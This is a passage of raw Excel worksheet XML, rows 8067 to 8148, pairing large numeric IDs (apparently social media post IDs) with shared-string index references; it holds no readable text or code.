    <row r="8067" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8067">
        <v>1.2329522642450199E+18</v>
      </c>
      <c r="B8067" t="s">
        <v>19485</v>
      </c>
      <c r="C8067" t="s">
        <v>1</v>
      </c>
      <c r="D8067" t="s">
        <v>19486</v>
      </c>
      <c r="E8067" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="8068" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8068">
        <v>1.2329520420727601E+18</v>
      </c>
      <c r="B8068" t="s">
        <v>19487</v>
      </c>
      <c r="C8068" t="s">
        <v>1</v>
      </c>
      <c r="D8068" t="s">
        <v>19488</v>
      </c>
      <c r="E8068" t="s">
        <v>6034</v>
      </c>
    </row>
    <row r="8069" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8069">
        <v>1.2329517562895201E+18</v>
      </c>
      <c r="B8069" t="s">
        <v>19489</v>
      </c>
      <c r="C8069" t="s">
        <v>1</v>
      </c>
      <c r="D8069" t="s">
        <v>19490</v>
      </c>
      <c r="E8069" t="s">
        <v>19491</v>
      </c>
    </row>
    <row r="8070" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8070">
        <v>1.23295157988143E+18</v>
      </c>
      <c r="B8070" t="s">
        <v>19492</v>
      </c>
      <c r="C8070" t="s">
        <v>1</v>
      </c>
      <c r="D8070" t="s">
        <v>19493</v>
      </c>
      <c r="E8070" t="s">
        <v>19494</v>
      </c>
    </row>
    <row r="8071" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8071">
        <v>1.23295144839841E+18</v>
      </c>
      <c r="B8071" t="s">
        <v>19495</v>
      </c>
      <c r="C8071" t="s">
        <v>1</v>
      </c>
      <c r="D8071" t="s">
        <v>19496</v>
      </c>
      <c r="E8071" t="s">
        <v>19497</v>
      </c>
    </row>
    <row r="8072" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8072">
        <v>1.23295098576653E+18</v>
      </c>
      <c r="B8072" t="s">
        <v>19498</v>
      </c>
      <c r="C8072" t="s">
        <v>1</v>
      </c>
      <c r="D8072" t="s">
        <v>19499</v>
      </c>
      <c r="E8072" t="s">
        <v>3100</v>
      </c>
    </row>
    <row r="8073" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8073">
        <v>1.2329503081726999E+18</v>
      </c>
      <c r="B8073" t="s">
        <v>19500</v>
      </c>
      <c r="C8073" t="s">
        <v>1</v>
      </c>
      <c r="D8073" t="s">
        <v>19501</v>
      </c>
      <c r="E8073" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8074" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8074">
        <v>1.2329501625546601E+18</v>
      </c>
      <c r="B8074" t="s">
        <v>19502</v>
      </c>
      <c r="C8074" t="s">
        <v>1</v>
      </c>
      <c r="D8074" t="s">
        <v>19503</v>
      </c>
      <c r="E8074" t="s">
        <v>18605</v>
      </c>
    </row>
    <row r="8075" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8075">
        <v>1.2329500518669801E+18</v>
      </c>
      <c r="B8075" t="s">
        <v>19504</v>
      </c>
      <c r="C8075" t="s">
        <v>1</v>
      </c>
      <c r="D8075" t="s">
        <v>19505</v>
      </c>
      <c r="E8075" t="s">
        <v>19506</v>
      </c>
    </row>
    <row r="8076" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8076">
        <v>1.23294977662429E+18</v>
      </c>
      <c r="B8076" t="s">
        <v>19507</v>
      </c>
      <c r="C8076" t="s">
        <v>1</v>
      </c>
      <c r="D8076" t="s">
        <v>19508</v>
      </c>
      <c r="E8076" t="s">
        <v>19509</v>
      </c>
    </row>
    <row r="8077" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8077">
        <v>1.2329497672919601E+18</v>
      </c>
      <c r="B8077" t="s">
        <v>19510</v>
      </c>
      <c r="C8077" t="s">
        <v>1</v>
      </c>
      <c r="D8077" t="s">
        <v>3652</v>
      </c>
      <c r="E8077" t="s">
        <v>3653</v>
      </c>
    </row>
    <row r="8078" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8078">
        <v>1.2329497546210401E+18</v>
      </c>
      <c r="B8078" t="s">
        <v>19511</v>
      </c>
      <c r="C8078" t="s">
        <v>1</v>
      </c>
      <c r="D8078" t="s">
        <v>19512</v>
      </c>
      <c r="E8078" t="s">
        <v>19513</v>
      </c>
    </row>
    <row r="8079" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8079">
        <v>1.2329494144797E+18</v>
      </c>
      <c r="B8079" t="s">
        <v>19514</v>
      </c>
      <c r="C8079" t="s">
        <v>1</v>
      </c>
      <c r="D8079" t="s">
        <v>19515</v>
      </c>
      <c r="E8079" t="s">
        <v>19516</v>
      </c>
    </row>
    <row r="8080" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8080">
        <v>1.2329492302155899E+18</v>
      </c>
      <c r="B8080" t="s">
        <v>19517</v>
      </c>
      <c r="C8080" t="s">
        <v>1</v>
      </c>
      <c r="D8080" t="s">
        <v>19518</v>
      </c>
      <c r="E8080" t="s">
        <v>18660</v>
      </c>
    </row>
    <row r="8081" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8081">
        <v>1.23294911766977E+18</v>
      </c>
      <c r="B8081" t="s">
        <v>19519</v>
      </c>
      <c r="C8081" t="s">
        <v>1</v>
      </c>
      <c r="D8081" t="s">
        <v>19520</v>
      </c>
      <c r="E8081" t="s">
        <v>19521</v>
      </c>
    </row>
    <row r="8082" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8082">
        <v>1.2329484985779799E+18</v>
      </c>
      <c r="B8082" t="s">
        <v>19522</v>
      </c>
      <c r="C8082" t="s">
        <v>1</v>
      </c>
      <c r="D8082" t="s">
        <v>19523</v>
      </c>
      <c r="E8082" t="s">
        <v>19524</v>
      </c>
    </row>
    <row r="8083" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8083">
        <v>1.2329479883576599E+18</v>
      </c>
      <c r="B8083" t="s">
        <v>19525</v>
      </c>
      <c r="C8083" t="s">
        <v>1</v>
      </c>
      <c r="D8083" t="s">
        <v>19526</v>
      </c>
      <c r="E8083" t="s">
        <v>19527</v>
      </c>
    </row>
    <row r="8084" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8084">
        <v>1.23294728218782E+18</v>
      </c>
      <c r="B8084" t="s">
        <v>19528</v>
      </c>
      <c r="C8084" t="s">
        <v>1</v>
      </c>
      <c r="D8084" t="s">
        <v>19529</v>
      </c>
      <c r="E8084" t="s">
        <v>19530</v>
      </c>
    </row>
    <row r="8085" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8085">
        <v>1.2329472317010299E+18</v>
      </c>
      <c r="B8085" t="s">
        <v>19531</v>
      </c>
      <c r="C8085" t="s">
        <v>1</v>
      </c>
      <c r="D8085" t="s">
        <v>19532</v>
      </c>
      <c r="E8085" t="s">
        <v>19533</v>
      </c>
    </row>
    <row r="8086" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8086">
        <v>1.2329470211008E+18</v>
      </c>
      <c r="B8086" t="s">
        <v>19534</v>
      </c>
      <c r="C8086" t="s">
        <v>1</v>
      </c>
      <c r="D8086" t="s">
        <v>19535</v>
      </c>
      <c r="E8086" t="s">
        <v>19536</v>
      </c>
    </row>
    <row r="8087" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8087">
        <v>1.2329469051031601E+18</v>
      </c>
      <c r="B8087" t="s">
        <v>19537</v>
      </c>
      <c r="C8087" t="s">
        <v>1</v>
      </c>
      <c r="D8087" t="s">
        <v>19538</v>
      </c>
      <c r="E8087" t="s">
        <v>19539</v>
      </c>
    </row>
    <row r="8088" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8088">
        <v>1.23294646765389E+18</v>
      </c>
      <c r="B8088" t="s">
        <v>19540</v>
      </c>
      <c r="C8088" t="s">
        <v>1</v>
      </c>
      <c r="D8088" t="s">
        <v>19541</v>
      </c>
      <c r="E8088" t="s">
        <v>19542</v>
      </c>
    </row>
    <row r="8089" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8089">
        <v>1.2329462098467799E+18</v>
      </c>
      <c r="B8089" t="s">
        <v>19543</v>
      </c>
      <c r="C8089" t="s">
        <v>1</v>
      </c>
      <c r="D8089" t="s">
        <v>19544</v>
      </c>
      <c r="E8089" t="s">
        <v>6223</v>
      </c>
    </row>
    <row r="8090" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8090">
        <v>1.2329460391261801E+18</v>
      </c>
      <c r="B8090" t="s">
        <v>19545</v>
      </c>
      <c r="C8090" t="s">
        <v>1</v>
      </c>
      <c r="D8090" t="s">
        <v>19546</v>
      </c>
      <c r="E8090" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="8091" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8091">
        <v>1.23294601937523E+18</v>
      </c>
      <c r="B8091" t="s">
        <v>19547</v>
      </c>
      <c r="C8091" t="s">
        <v>1</v>
      </c>
      <c r="D8091" t="s">
        <v>19548</v>
      </c>
      <c r="E8091" t="s">
        <v>3447</v>
      </c>
    </row>
    <row r="8092" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8092">
        <v>1.23294598254483E+18</v>
      </c>
      <c r="B8092" t="s">
        <v>19549</v>
      </c>
      <c r="C8092" t="s">
        <v>1</v>
      </c>
      <c r="D8092" t="s">
        <v>19550</v>
      </c>
      <c r="E8092" t="s">
        <v>19551</v>
      </c>
    </row>
    <row r="8093" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8093">
        <v>1.2329457665968901E+18</v>
      </c>
      <c r="B8093" t="s">
        <v>19552</v>
      </c>
      <c r="C8093" t="s">
        <v>1</v>
      </c>
      <c r="D8093" t="s">
        <v>19553</v>
      </c>
      <c r="E8093" t="s">
        <v>19554</v>
      </c>
    </row>
    <row r="8094" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8094">
        <v>1.2329456215117599E+18</v>
      </c>
      <c r="B8094" t="s">
        <v>19555</v>
      </c>
      <c r="C8094" t="s">
        <v>1</v>
      </c>
      <c r="D8094" t="s">
        <v>19556</v>
      </c>
      <c r="E8094" t="s">
        <v>19557</v>
      </c>
    </row>
    <row r="8095" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8095">
        <v>1.23294546929218E+18</v>
      </c>
      <c r="B8095" t="s">
        <v>19558</v>
      </c>
      <c r="C8095" t="s">
        <v>1</v>
      </c>
      <c r="D8095" t="s">
        <v>19559</v>
      </c>
      <c r="E8095" t="s">
        <v>19100</v>
      </c>
    </row>
    <row r="8096" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8096">
        <v>1.2329445492339E+18</v>
      </c>
      <c r="B8096" t="s">
        <v>19560</v>
      </c>
      <c r="C8096" t="s">
        <v>1</v>
      </c>
      <c r="D8096" t="s">
        <v>19561</v>
      </c>
      <c r="E8096" t="s">
        <v>19562</v>
      </c>
    </row>
    <row r="8097" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8097">
        <v>1.23294418728639E+18</v>
      </c>
      <c r="B8097" t="s">
        <v>19563</v>
      </c>
      <c r="C8097" t="s">
        <v>1</v>
      </c>
      <c r="D8097" t="s">
        <v>19564</v>
      </c>
      <c r="E8097" t="s">
        <v>19565</v>
      </c>
    </row>
    <row r="8098" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8098">
        <v>1.2329435325513999E+18</v>
      </c>
      <c r="B8098" t="s">
        <v>19566</v>
      </c>
      <c r="C8098" t="s">
        <v>1</v>
      </c>
      <c r="D8098" t="s">
        <v>19567</v>
      </c>
      <c r="E8098" t="s">
        <v>19568</v>
      </c>
    </row>
    <row r="8099" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8099">
        <v>1.2329432225755699E+18</v>
      </c>
      <c r="B8099" t="s">
        <v>19569</v>
      </c>
      <c r="C8099" t="s">
        <v>1</v>
      </c>
      <c r="D8099" t="s">
        <v>19570</v>
      </c>
      <c r="E8099" t="s">
        <v>19571</v>
      </c>
    </row>
    <row r="8100" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8100">
        <v>1.2329422770325901E+18</v>
      </c>
      <c r="B8100" t="s">
        <v>19572</v>
      </c>
      <c r="C8100" t="s">
        <v>1</v>
      </c>
      <c r="D8100" t="s">
        <v>5</v>
      </c>
      <c r="E8100" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8101" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8101">
        <v>1.2329421951973399E+18</v>
      </c>
      <c r="B8101" t="s">
        <v>19573</v>
      </c>
      <c r="C8101" t="s">
        <v>1</v>
      </c>
      <c r="D8101" t="s">
        <v>19574</v>
      </c>
      <c r="E8101" t="s">
        <v>19575</v>
      </c>
    </row>
    <row r="8102" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8102">
        <v>1.2329417616701E+18</v>
      </c>
      <c r="B8102" t="s">
        <v>19576</v>
      </c>
      <c r="C8102" t="s">
        <v>1</v>
      </c>
      <c r="D8102" t="s">
        <v>19577</v>
      </c>
      <c r="E8102" t="s">
        <v>19578</v>
      </c>
    </row>
    <row r="8103" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8103">
        <v>1.2329412784693199E+18</v>
      </c>
      <c r="B8103" t="s">
        <v>19579</v>
      </c>
      <c r="C8103" t="s">
        <v>1</v>
      </c>
      <c r="D8103" t="s">
        <v>19580</v>
      </c>
      <c r="E8103" t="s">
        <v>19581</v>
      </c>
    </row>
    <row r="8104" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8104">
        <v>1.2329412420839199E+18</v>
      </c>
      <c r="B8104" t="s">
        <v>19582</v>
      </c>
      <c r="C8104" t="s">
        <v>1</v>
      </c>
      <c r="D8104" t="s">
        <v>19583</v>
      </c>
      <c r="E8104" t="s">
        <v>3001</v>
      </c>
    </row>
    <row r="8105" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8105">
        <v>1.23294093701117E+18</v>
      </c>
      <c r="B8105" t="s">
        <v>19584</v>
      </c>
      <c r="C8105" t="s">
        <v>1</v>
      </c>
      <c r="D8105" t="s">
        <v>19585</v>
      </c>
      <c r="E8105" t="s">
        <v>6160</v>
      </c>
    </row>
    <row r="8106" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8106">
        <v>1.23293939253426E+18</v>
      </c>
      <c r="B8106" t="s">
        <v>19586</v>
      </c>
      <c r="C8106" t="s">
        <v>1</v>
      </c>
      <c r="D8106" t="s">
        <v>19587</v>
      </c>
      <c r="E8106" t="s">
        <v>19588</v>
      </c>
    </row>
    <row r="8107" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8107">
        <v>1.23293917564258E+18</v>
      </c>
      <c r="B8107" t="s">
        <v>19589</v>
      </c>
      <c r="C8107" t="s">
        <v>1</v>
      </c>
      <c r="D8107" t="s">
        <v>19590</v>
      </c>
      <c r="E8107" t="s">
        <v>1156</v>
      </c>
    </row>
    <row r="8108" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8108">
        <v>1.23293871685278E+18</v>
      </c>
      <c r="B8108" t="s">
        <v>19591</v>
      </c>
      <c r="C8108" t="s">
        <v>1</v>
      </c>
      <c r="D8108" t="s">
        <v>19592</v>
      </c>
      <c r="E8108" t="s">
        <v>19593</v>
      </c>
    </row>
    <row r="8109" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8109">
        <v>1.2329384854195699E+18</v>
      </c>
      <c r="B8109" t="s">
        <v>19594</v>
      </c>
      <c r="C8109" t="s">
        <v>1</v>
      </c>
      <c r="D8109" t="s">
        <v>19595</v>
      </c>
      <c r="E8109" t="s">
        <v>19596</v>
      </c>
    </row>
    <row r="8110" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8110">
        <v>1.23293847635981E+18</v>
      </c>
      <c r="B8110" t="s">
        <v>19597</v>
      </c>
      <c r="C8110" t="s">
        <v>1</v>
      </c>
      <c r="D8110" t="s">
        <v>19598</v>
      </c>
      <c r="E8110" t="s">
        <v>3538</v>
      </c>
    </row>
    <row r="8111" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8111">
        <v>1.2329384635378299E+18</v>
      </c>
      <c r="B8111" t="s">
        <v>19599</v>
      </c>
      <c r="C8111" t="s">
        <v>1</v>
      </c>
      <c r="D8111" t="s">
        <v>19600</v>
      </c>
      <c r="E8111" t="s">
        <v>19601</v>
      </c>
    </row>
    <row r="8112" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8112">
        <v>1.2329384354612201E+18</v>
      </c>
      <c r="B8112" t="s">
        <v>19602</v>
      </c>
      <c r="C8112" t="s">
        <v>1</v>
      </c>
      <c r="D8112" t="s">
        <v>19603</v>
      </c>
      <c r="E8112" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="8113" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8113">
        <v>1.2329381691648399E+18</v>
      </c>
      <c r="B8113" t="s">
        <v>19604</v>
      </c>
      <c r="C8113" t="s">
        <v>1</v>
      </c>
      <c r="D8113" t="s">
        <v>19605</v>
      </c>
      <c r="E8113" t="s">
        <v>19606</v>
      </c>
    </row>
    <row r="8114" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8114">
        <v>1.23293803486723E+18</v>
      </c>
      <c r="B8114" t="s">
        <v>19607</v>
      </c>
      <c r="C8114" t="s">
        <v>1</v>
      </c>
      <c r="D8114" t="s">
        <v>19608</v>
      </c>
      <c r="E8114" t="s">
        <v>19609</v>
      </c>
    </row>
    <row r="8115" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8115">
        <v>1.23293782540383E+18</v>
      </c>
      <c r="B8115" t="s">
        <v>19610</v>
      </c>
      <c r="C8115" t="s">
        <v>1</v>
      </c>
      <c r="D8115" t="s">
        <v>19611</v>
      </c>
      <c r="E8115" t="s">
        <v>19612</v>
      </c>
    </row>
    <row r="8116" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8116">
        <v>1.23293658624287E+18</v>
      </c>
      <c r="B8116" t="s">
        <v>19613</v>
      </c>
      <c r="C8116" t="s">
        <v>1</v>
      </c>
      <c r="D8116" t="s">
        <v>19614</v>
      </c>
      <c r="E8116" t="s">
        <v>19615</v>
      </c>
    </row>
    <row r="8117" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8117">
        <v>1.23293590376253E+18</v>
      </c>
      <c r="B8117" t="s">
        <v>19616</v>
      </c>
      <c r="C8117" t="s">
        <v>1</v>
      </c>
      <c r="D8117" t="s">
        <v>19617</v>
      </c>
      <c r="E8117" t="s">
        <v>19618</v>
      </c>
    </row>
    <row r="8118" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8118">
        <v>1.23293521358143E+18</v>
      </c>
      <c r="B8118" t="s">
        <v>19619</v>
      </c>
      <c r="C8118" t="s">
        <v>1</v>
      </c>
      <c r="D8118" t="s">
        <v>19620</v>
      </c>
      <c r="E8118" t="s">
        <v>19621</v>
      </c>
    </row>
    <row r="8119" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8119">
        <v>1.2329352058723E+18</v>
      </c>
      <c r="B8119" t="s">
        <v>19622</v>
      </c>
      <c r="C8119" t="s">
        <v>1</v>
      </c>
      <c r="D8119" t="s">
        <v>19623</v>
      </c>
      <c r="E8119" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8120" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8120">
        <v>1.2329352038968E+18</v>
      </c>
      <c r="B8120" t="s">
        <v>19622</v>
      </c>
      <c r="C8120" t="s">
        <v>1</v>
      </c>
      <c r="D8120" t="s">
        <v>19624</v>
      </c>
      <c r="E8120" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8121" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8121">
        <v>1.23293425322417E+18</v>
      </c>
      <c r="B8121" t="s">
        <v>19625</v>
      </c>
      <c r="C8121" t="s">
        <v>1</v>
      </c>
      <c r="D8121" t="s">
        <v>19626</v>
      </c>
      <c r="E8121" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="8122" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8122">
        <v>1.2329338207327201E+18</v>
      </c>
      <c r="B8122" t="s">
        <v>19627</v>
      </c>
      <c r="C8122" t="s">
        <v>1</v>
      </c>
      <c r="D8122" t="s">
        <v>19628</v>
      </c>
      <c r="E8122" t="s">
        <v>19629</v>
      </c>
    </row>
    <row r="8123" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8123">
        <v>1.2329333961517801E+18</v>
      </c>
      <c r="B8123" t="s">
        <v>19630</v>
      </c>
      <c r="C8123" t="s">
        <v>1</v>
      </c>
      <c r="D8123" t="s">
        <v>19631</v>
      </c>
      <c r="E8123" t="s">
        <v>19188</v>
      </c>
    </row>
    <row r="8124" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8124">
        <v>1.23293258150877E+18</v>
      </c>
      <c r="B8124" t="s">
        <v>19632</v>
      </c>
      <c r="C8124" t="s">
        <v>1</v>
      </c>
      <c r="D8124" t="s">
        <v>19633</v>
      </c>
      <c r="E8124" t="s">
        <v>16955</v>
      </c>
    </row>
    <row r="8125" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8125">
        <v>1.2329325753765901E+18</v>
      </c>
      <c r="B8125" t="s">
        <v>19634</v>
      </c>
      <c r="C8125" t="s">
        <v>1</v>
      </c>
      <c r="D8125" t="s">
        <v>19635</v>
      </c>
      <c r="E8125" t="s">
        <v>19636</v>
      </c>
    </row>
    <row r="8126" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8126">
        <v>1.23293158723647E+18</v>
      </c>
      <c r="B8126" t="s">
        <v>19637</v>
      </c>
      <c r="C8126" t="s">
        <v>1</v>
      </c>
      <c r="D8126" t="s">
        <v>19638</v>
      </c>
      <c r="E8126" t="s">
        <v>19639</v>
      </c>
    </row>
    <row r="8127" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8127">
        <v>1.2329314851638899E+18</v>
      </c>
      <c r="B8127" t="s">
        <v>19640</v>
      </c>
      <c r="C8127" t="s">
        <v>1</v>
      </c>
      <c r="D8127" t="s">
        <v>19641</v>
      </c>
      <c r="E8127" t="s">
        <v>19642</v>
      </c>
    </row>
    <row r="8128" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8128">
        <v>1.2329303811433999E+18</v>
      </c>
      <c r="B8128" t="s">
        <v>19643</v>
      </c>
      <c r="C8128" t="s">
        <v>1</v>
      </c>
      <c r="D8128" t="s">
        <v>19644</v>
      </c>
      <c r="E8128" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="8129" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8129">
        <v>1.2329287862507799E+18</v>
      </c>
      <c r="B8129" t="s">
        <v>19645</v>
      </c>
      <c r="C8129" t="s">
        <v>1</v>
      </c>
      <c r="D8129" t="s">
        <v>19646</v>
      </c>
      <c r="E8129" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="8130" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8130">
        <v>1.23292868862832E+18</v>
      </c>
      <c r="B8130" t="s">
        <v>19647</v>
      </c>
      <c r="C8130" t="s">
        <v>1</v>
      </c>
      <c r="D8130" t="s">
        <v>19648</v>
      </c>
      <c r="E8130" t="s">
        <v>19649</v>
      </c>
    </row>
    <row r="8131" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8131">
        <v>1.2329273966570701E+18</v>
      </c>
      <c r="B8131" t="s">
        <v>19650</v>
      </c>
      <c r="C8131" t="s">
        <v>1</v>
      </c>
      <c r="D8131" t="s">
        <v>19651</v>
      </c>
      <c r="E8131" t="s">
        <v>19034</v>
      </c>
    </row>
    <row r="8132" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8132">
        <v>1.23292699837437E+18</v>
      </c>
      <c r="B8132" t="s">
        <v>19652</v>
      </c>
      <c r="C8132" t="s">
        <v>1</v>
      </c>
      <c r="D8132" t="s">
        <v>19653</v>
      </c>
      <c r="E8132" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="8133" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8133">
        <v>1.23292689512719E+18</v>
      </c>
      <c r="B8133" t="s">
        <v>19654</v>
      </c>
      <c r="C8133" t="s">
        <v>1</v>
      </c>
      <c r="D8133" t="s">
        <v>19655</v>
      </c>
      <c r="E8133" t="s">
        <v>14558</v>
      </c>
    </row>
    <row r="8134" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8134">
        <v>1.2329245539255301E+18</v>
      </c>
      <c r="B8134" t="s">
        <v>19656</v>
      </c>
      <c r="C8134" t="s">
        <v>1</v>
      </c>
      <c r="D8134" t="s">
        <v>19657</v>
      </c>
      <c r="E8134" t="s">
        <v>19658</v>
      </c>
    </row>
    <row r="8135" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8135">
        <v>1.23292367646463E+18</v>
      </c>
      <c r="B8135" t="s">
        <v>19659</v>
      </c>
      <c r="C8135" t="s">
        <v>1</v>
      </c>
      <c r="D8135" t="s">
        <v>19660</v>
      </c>
      <c r="E8135" t="s">
        <v>2265</v>
      </c>
    </row>
    <row r="8136" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8136">
        <v>1.2329233653437399E+18</v>
      </c>
      <c r="B8136" t="s">
        <v>19661</v>
      </c>
      <c r="C8136" t="s">
        <v>1</v>
      </c>
      <c r="D8136" t="s">
        <v>19662</v>
      </c>
      <c r="E8136" t="s">
        <v>6666</v>
      </c>
    </row>
    <row r="8137" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8137">
        <v>1.2329228132515799E+18</v>
      </c>
      <c r="B8137" t="s">
        <v>19663</v>
      </c>
      <c r="C8137" t="s">
        <v>1</v>
      </c>
      <c r="D8137" t="s">
        <v>19664</v>
      </c>
      <c r="E8137" t="s">
        <v>6611</v>
      </c>
    </row>
    <row r="8138" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8138">
        <v>1.23292275108365E+18</v>
      </c>
      <c r="B8138" t="s">
        <v>19665</v>
      </c>
      <c r="C8138" t="s">
        <v>1</v>
      </c>
      <c r="D8138" t="s">
        <v>19666</v>
      </c>
      <c r="E8138" t="s">
        <v>19667</v>
      </c>
    </row>
    <row r="8139" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8139">
        <v>1.2329223140036301E+18</v>
      </c>
      <c r="B8139" t="s">
        <v>19668</v>
      </c>
      <c r="C8139" t="s">
        <v>1</v>
      </c>
      <c r="D8139" t="s">
        <v>19669</v>
      </c>
      <c r="E8139" t="s">
        <v>6690</v>
      </c>
    </row>
    <row r="8140" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8140">
        <v>1.23292145782034E+18</v>
      </c>
      <c r="B8140" t="s">
        <v>19670</v>
      </c>
      <c r="C8140" t="s">
        <v>1</v>
      </c>
      <c r="D8140" t="s">
        <v>19671</v>
      </c>
      <c r="E8140" t="s">
        <v>19672</v>
      </c>
    </row>
    <row r="8141" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8141">
        <v>1.2329211785257101E+18</v>
      </c>
      <c r="B8141" t="s">
        <v>19673</v>
      </c>
      <c r="C8141" t="s">
        <v>1</v>
      </c>
      <c r="D8141" t="s">
        <v>19674</v>
      </c>
      <c r="E8141" t="s">
        <v>19675</v>
      </c>
    </row>
    <row r="8142" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8142">
        <v>1.2329210582749701E+18</v>
      </c>
      <c r="B8142" t="s">
        <v>19676</v>
      </c>
      <c r="C8142" t="s">
        <v>1</v>
      </c>
      <c r="D8142" t="s">
        <v>19677</v>
      </c>
      <c r="E8142" t="s">
        <v>19678</v>
      </c>
    </row>
    <row r="8143" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8143">
        <v>1.2329207557818099E+18</v>
      </c>
      <c r="B8143" t="s">
        <v>19679</v>
      </c>
      <c r="C8143" t="s">
        <v>1</v>
      </c>
      <c r="D8143" t="s">
        <v>19680</v>
      </c>
      <c r="E8143" t="s">
        <v>19681</v>
      </c>
    </row>
    <row r="8144" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8144">
        <v>1.2329207483453399E+18</v>
      </c>
      <c r="B8144" t="s">
        <v>19682</v>
      </c>
      <c r="C8144" t="s">
        <v>1</v>
      </c>
      <c r="D8144" t="s">
        <v>19683</v>
      </c>
      <c r="E8144" t="s">
        <v>19684</v>
      </c>
    </row>
    <row r="8145" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8145">
        <v>1.2329205353922299E+18</v>
      </c>
      <c r="B8145" t="s">
        <v>19685</v>
      </c>
      <c r="C8145" t="s">
        <v>1</v>
      </c>
      <c r="D8145" t="s">
        <v>19686</v>
      </c>
      <c r="E8145" t="s">
        <v>19687</v>
      </c>
    </row>
    <row r="8146" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8146">
        <v>1.23292048774082E+18</v>
      </c>
      <c r="B8146" t="s">
        <v>19688</v>
      </c>
      <c r="C8146" t="s">
        <v>1</v>
      </c>
      <c r="D8146" t="s">
        <v>19689</v>
      </c>
      <c r="E8146" t="s">
        <v>19690</v>
      </c>
    </row>
    <row r="8147" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8147">
        <v>1.23292048671313E+18</v>
      </c>
      <c r="B8147" t="s">
        <v>19688</v>
      </c>
      <c r="C8147" t="s">
        <v>1</v>
      </c>
      <c r="D8147" t="s">
        <v>19691</v>
      </c>
      <c r="E8147" t="s">
        <v>19692</v>
      </c>
    </row>
    <row r="8148" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8148">
        <v>1.2329194403851699E+18</v>
